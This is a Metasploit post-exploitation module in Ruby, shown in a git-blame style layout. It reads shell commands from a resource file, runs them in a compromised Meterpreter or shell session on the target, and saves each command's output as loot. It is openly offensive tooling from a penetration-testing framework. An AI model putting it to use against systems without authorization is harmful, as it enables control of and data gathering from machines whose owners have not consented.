2011-03-22 22:59:01 +00:00
|
|
|
##
|
2013-10-15 19:52:12 +00:00
|
|
|
# This module requires Metasploit: http//metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2011-03-22 22:59:01 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'rex'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Post
|
|
|
|
|
2013-09-05 18:41:25 +00:00
|
|
|
def initialize(info={})
|
|
|
|
super( update_info( info,
|
|
|
|
'Name' => 'Multi Gather Run Shell Command Resource File',
|
|
|
|
'Description' => %q{ This module will read shell commands from a resource file and
|
|
|
|
execute the commands in the specified Meterpreter or shell session.},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
|
2013-09-24 17:33:31 +00:00
|
|
|
'Platform' => %w{ bsd linux osx unix win },
|
2013-09-05 18:41:25 +00:00
|
|
|
'SessionTypes' => [ 'meterpreter','shell' ]
|
|
|
|
))
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('RESOURCE', [true, 'Full path to resource file to read commands from.', nil])
|
2011-03-22 22:59:01 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
], self.class)
|
|
|
|
end
|
2011-03-22 22:59:01 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Run Method for when run command is issued
|
|
|
|
def run
|
|
|
|
session_type = session.type
|
|
|
|
print_status("Running module against #{sysinfo['Computer']}")
|
|
|
|
if not ::File.exists?(datastore['RESOURCE'])
|
|
|
|
raise "Resource File does not exists!"
|
|
|
|
else
|
|
|
|
::File.open(datastore['RESOURCE'], "rb").each_line do |cmd|
|
|
|
|
next if cmd.strip.length < 1
|
|
|
|
next if cmd[0,1] == "#"
|
|
|
|
begin
|
|
|
|
tmpout = "\n"
|
|
|
|
tmpout << "*****************************************\n"
|
|
|
|
tmpout << " Output of #{cmd}\n"
|
|
|
|
tmpout << "*****************************************\n"
|
|
|
|
print_status "Running command #{cmd.chomp}"
|
|
|
|
if session_type =~ /meterpreter/
|
|
|
|
tmpout << cmd_exec(cmd.chomp)
|
|
|
|
elsif session_type =~ /shell/
|
|
|
|
tmpout << session.shell_command_token(cmd.chomp).chomp
|
|
|
|
end
|
|
|
|
vprint_status tmpout
|
|
|
|
command_log = store_loot("host.command", "text/plain", session,tmpout ,
|
|
|
|
"#{cmd.gsub(/\.|\/|\s/,"_")}.txt", "Command Output \'#{cmd.chomp}\'")
|
|
|
|
print_status("Command output saved to: #{command_log}")
|
|
|
|
rescue ::Exception => e
|
|
|
|
print_status("Error Running Command #{cmd.chomp}: #{e.class} #{e}")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
2011-07-15 15:33:35 +00:00
|
|
|
end
|